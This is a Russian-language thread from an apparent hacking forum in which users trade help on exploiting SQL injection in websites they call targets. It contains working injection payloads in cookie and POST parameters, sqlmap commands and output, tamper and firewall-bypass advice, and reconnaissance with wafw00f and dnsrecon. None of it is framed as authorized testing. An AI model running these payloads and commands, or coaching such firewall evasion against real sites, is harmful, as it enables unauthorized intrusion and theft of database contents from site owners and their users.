• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Окунь выдает такую информацию:
Код:
Cookie input adtech_uid was set to ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*3*9<(2*4) AND "000IGL2"="000IGL2

Tests performed:
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 2*3*8=6*8 AND "000IGL2"="000IGL2 => TRUE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 2*3*8=6*9 AND "000IGL2"="000IGL2 => FALSE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*3<(2*4) AND "000IGL2"="000IGL2 => FALSE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*2>(1*5) AND "000IGL2"="000IGL2 => TRUE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*2*0>=0 AND "000IGL2"="000IGL2 => TRUE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*3*9<(2*4) AND "000IGL2"="000IGL2 => FALSE


Original value: ca993490-2349-42e3-ab4b-01347d29e9b4:example.com

Proof of Exploit
SQL query - SELECT current_database()
fo

Так полагаю это не фолс детект, если он смог получить имя базы? Но мапой ни в какую не раскручивается, команда мапы:
Код:
sqlmap.py -r 12313.txt -p 'adtech_uid' --level 5 --risk 3 --random-agent
Запрос, который скармливаю:
Код:
GET https://example.com/vrgames/simulate/ HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Cookie: adtech_uid=ca993490-2349-42e3-ab4b-01347d29e9b4:example.com*; top100_id=t1.7155260.657845929.1682017967908; last_visit=1682012294503::1682023094503; _nTab_main=1; _nAccordeonOpened=29; t3_sid_7155260=s1.1111065334.1682017967912.1682023168426.1.21613; jsc=694722c6068a21c9763cec723b70b906
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: example.com
Connection: Keep-alive

Пробовал ставить разные тамперы, но все равно никак не получается раскрутить.
Тоже стало интересно по этому таргету, на какой-то поке из предоставленных тобою и окунем выдало баннер с ошибкой sql, при повторных тестах не появлялось больше
 
Окунь выдает такую информацию:
Код:
Cookie input adtech_uid was set to ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*3*9<(2*4) AND "000IGL2"="000IGL2

Tests performed:
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 2*3*8=6*8 AND "000IGL2"="000IGL2 => TRUE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 2*3*8=6*9 AND "000IGL2"="000IGL2 => FALSE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*3<(2*4) AND "000IGL2"="000IGL2 => FALSE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*2>(1*5) AND "000IGL2"="000IGL2 => TRUE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*2*0>=0 AND "000IGL2"="000IGL2 => TRUE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*3*9<(2*4) AND "000IGL2"="000IGL2 => FALSE


Original value: ca993490-2349-42e3-ab4b-01347d29e9b4:example.com

Proof of Exploit
SQL query - SELECT current_database()
fo

Так полагаю это не фолс детект, если он смог получить имя базы? Но мапой ни в какую не раскручивается, команда мапы:
Код:
sqlmap.py -r 12313.txt -p 'adtech_uid' --level 5 --risk 3 --random-agent
Запрос, который скармливаю:
Код:
GET https://example.com/vrgames/simulate/ HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Cookie: adtech_uid=ca993490-2349-42e3-ab4b-01347d29e9b4:example.com*; top100_id=t1.7155260.657845929.1682017967908; last_visit=1682012294503::1682023094503; _nTab_main=1; _nAccordeonOpened=29; t3_sid_7155260=s1.1111065334.1682017967912.1682023168426.1.21613; jsc=694722c6068a21c9763cec723b70b906
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: example.com
Connection: Keep-alive

Пробовал ставить разные тамперы, но все равно никак не получается раскрутить.
Убери параметр -p и добавь dbms=mssql . Также смотри , что отвечает сервер.
 
Убери параметр -p и добавь dbms=mssql . Также смотри , что отвечает сервер.
Ответом приходит html страница, как и должно быть.
На сайте есть WAF (движок DLE) и мапа его видит, пытаясь засунуть в GET параметры скулю, на что получает ответ "Hacking attempt!", но не знаю, фильтрует ли WAF значение кукисов или нет. (с скулей в куках ответа "Hacking attempt!" нет).
 
Ответом приходит html страница, как и должно быть.
На сайте есть WAF (движок DLE) и мапа его видит, пытаясь засунуть в GET параметры скулю, на что получает ответ "Hacking attempt!", но не знаю, фильтрует ли WAF значение кукисов или нет. (с скулей в куках ответа "Hacking attempt!" нет).
Зачем get, если у тебя в куках уязвимость ?
 
Зачем get, если у тебя в куках уязвимость ?
get был в запросе от окуня, и мапа проверят наличие waf'a гетом. Сменив запрос на post все еще не находит уязвимость.
 
get был в запросе от окуня, и мапа проверят наличие waf'a гетом. Сменив запрос на post все еще не находит уязвимость.
--url="https://example.com/vrgames/simulate/" --cookie="adtech_uid=ca993490-2349-42e3-ab4b-01347d29e9b4:example.com*" --dbms=mssql --batch --random-agent

Возможно ошибся и скорее всего --dbms=postgresql
 
Окунь выдает такую информацию:
Код:
Cookie input adtech_uid was set to ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*3*9<(2*4) AND "000IGL2"="000IGL2

Tests performed:
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 2*3*8=6*8 AND "000IGL2"="000IGL2 => TRUE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 2*3*8=6*9 AND "000IGL2"="000IGL2 => FALSE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*3<(2*4) AND "000IGL2"="000IGL2 => FALSE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*2>(1*5) AND "000IGL2"="000IGL2 => TRUE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*2*0>=0 AND "000IGL2"="000IGL2 => TRUE
ca993490-2349-42e3-ab4b-01347d29e9b4:example.com" AND 3*3*9<(2*4) AND "000IGL2"="000IGL2 => FALSE


Original value: ca993490-2349-42e3-ab4b-01347d29e9b4:example.com

Proof of Exploit
SQL query - SELECT current_database()
fo

Так полагаю это не фолс детект, если он смог получить имя базы? Но мапой ни в какую не раскручивается, команда мапы:
Код:
sqlmap.py -r 12313.txt -p 'adtech_uid' --level 5 --risk 3 --random-agent
Запрос, который скармливаю:
Код:
GET https://example.com/vrgames/simulate/ HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Cookie: adtech_uid=ca993490-2349-42e3-ab4b-01347d29e9b4:example.com*; top100_id=t1.7155260.657845929.1682017967908; last_visit=1682012294503::1682023094503; _nTab_main=1; _nAccordeonOpened=29; t3_sid_7155260=s1.1111065334.1682017967912.1682023168426.1.21613; jsc=694722c6068a21c9763cec723b70b906
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: example.com
Connection: Keep-alive

Пробовал ставить разные тамперы, но все равно никак не получается раскрутить.
была такаяже проблема , выше спрашивал, так же окунь вывел название бд, но мапом я так и не открыл его. В этой или другой ветке советовали попробовать как вриант вот этот аналог мапы, к стати одну цель мне получилось открыть, хотя паралельно мап даже не дошел до бд.
проблема только как в файл запихнуть -r , выдает ошибку что файл не найден, ну и команды --search тоже не понял как применить, она там не работает, короче попоробуй.
 
Последнее редактирование:
У мапы есть полезная функция -v 3 через нее посмотреть что она отправляет и что получает, бывает помогает понять в чем проблема и почему мапа не видит дыру, и так же тамперы подбирать удобнее
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Как в паме без sql-shell посмотреть обновления в таблице без использования --flush-session и --purge? Чтобы не сканировать заного сайт?
 
Как в паме без sql-shell посмотреть обновления в таблице без использования --flush-session и --purge? Чтобы не сканировать заного сайт?
--fresh-queries
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Если при id=' получаю Syntex error mysql всегда ли эта уязвимость? Уже, что не пробовал, не могу пробить. might be not enjectable
 
What can I do? When I tested website with sqlmap, I received many time-based blind injection - parameters "sSellerID, sName, sCase", but at the end all of them result is same - "false positive or unexploitable"
[14:50:25] [INFO] GET parameter 'sSellerID' appears to be 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)' injectable
it looks like the back-end DBMS is 'Microsoft SQL Server/Sybase'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
......................................................................................................................................................................................................
[WARNING] false positive or unexploitable injection point detected
[15:07:58] [WARNING] GET parameter 'sSellerID' does not seem to be injectable
[15:07:58] [CRITICAL] all tested parameters do not appear to be injectable
 
Помогитте пожалуйста определить что за WAF и как его можно обойти
попалась уже 3 тья цель с каким то непонятным WAF или блоком , я пробовал по примеру ModSecurity убирать фильтры с select union slleep итд , начал перекрыватьк аждое слово , через время там где прокатывало опять начинал срабатывать ваф. Вот еще один такой же попался
[02:27:02] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
потом понятное дело результат такой
Код:
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 695 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: createdate=2023-5-3 14:44:18&email=testing@example.com' AND MAKE_SET(4404=4404,1771)-- Bagi&status=0

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: createdate=2023-5-3 14:44:18&email=testing@example.com' AND 9556=BENCHMARK(32000000,MD5(0x48694562))-- eSsS&status=0
---
[02:57:46] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:57:46] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 7.2.34
back-end DBMS: MySQL < 5.0.12 (MariaDB fork)
[02:57:47] [INFO] fetching database names
[02:57:47] [INFO] fetching number of databases
[02:57:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:57:47] [INFO] retrieved:
[02:57:48] [WARNING] unexpected HTTP code '404' detected. Will use (extra) validation step in similar cases

[02:57:51] [INFO] retrieved:
[02:57:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[02:57:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[02:57:55] [ERROR] unable to retrieve the number of databases
[02:57:55] [INFO] falling back to current database
[02:57:55] [INFO] fetching current database
[02:57:55] [INFO] retrieved:
[02:57:59] [INFO] retrieved:
[02:58:03] [CRITICAL] unable to retrieve the database names
[02:58:03] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 307 times, 500 (Internal Server Error) - 314 times

Код:
                        ~ WAFW00F : v2.2.0 ~                                
        The Web Application Firewall Fingerprinting Toolkit                
                                                                           
[*] Checking https://www.test.com
[+] Generic Detection results:
[*] The site https://www.test.com seems to be behind a WAF or some sort of security solution
[~] Reason: The server returns a different response code when an attack string is used.
Normal response code is "200", while the response code to cross-site scripting attack is "404"
[~] Number of requests: 5
помогите пожалуйста , реально не пойму , вроде бы и цели не такие уж большие.
 
Помогитте пожалуйста определить что за WAF и как его можно обойти
попалась уже 3 тья цель с каким то непонятным WAF или блоком , я пробовал по примеру ModSecurity убирать фильтры с select union slleep итд , начал перекрыватьк аждое слово , через время там где прокатывало опять начинал срабатывать ваф. Вот еще один такой же попался
[02:27:02] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
потом понятное дело результат такой
Код:
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 695 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: createdate=2023-5-3 14:44:18&email=testing@example.com' AND MAKE_SET(4404=4404,1771)-- Bagi&status=0

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: createdate=2023-5-3 14:44:18&email=testing@example.com' AND 9556=BENCHMARK(32000000,MD5(0x48694562))-- eSsS&status=0
---
[02:57:46] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:57:46] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 7.2.34
back-end DBMS: MySQL < 5.0.12 (MariaDB fork)
[02:57:47] [INFO] fetching database names
[02:57:47] [INFO] fetching number of databases
[02:57:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:57:47] [INFO] retrieved:
[02:57:48] [WARNING] unexpected HTTP code '404' detected. Will use (extra) validation step in similar cases

[02:57:51] [INFO] retrieved:
[02:57:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[02:57:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[02:57:55] [ERROR] unable to retrieve the number of databases
[02:57:55] [INFO] falling back to current database
[02:57:55] [INFO] fetching current database
[02:57:55] [INFO] retrieved:
[02:57:59] [INFO] retrieved:
[02:58:03] [CRITICAL] unable to retrieve the database names
[02:58:03] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 307 times, 500 (Internal Server Error) - 314 times

Код:
                        ~ WAFW00F : v2.2.0 ~                               
        The Web Application Firewall Fingerprinting Toolkit               
                                                                          
[*] Checking https://www.test.com
[+] Generic Detection results:
[*] The site https://www.test.com seems to be behind a WAF or some sort of security solution
[~] Reason: The server returns a different response code when an attack string is used.
Normal response code is "200", while the response code to cross-site scripting attack is "404"
[~] Number of requests: 5
помогите пожалуйста , реально не пойму , вроде бы и цели не такие уж большие.
разведай DNS, там увидишь, может быть клаудфлейр тебе меншает
 
разведай DNS, там увидишь, может быть клаудфлейр тебе меншает
а можно поподробней пожалуйста, прверил https://search.censys.io , никакого упоминания claud не нашел, ну если я там смотрю конечно
 
ну через
dnsrecon попробуй
─$ dnsrecon -d site.com
тоже самое показывает про клауд ничего нет, ну или опять же я может не так что то делаю.
[*] Enumerating SRV Records
[+] 0 Records Found
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх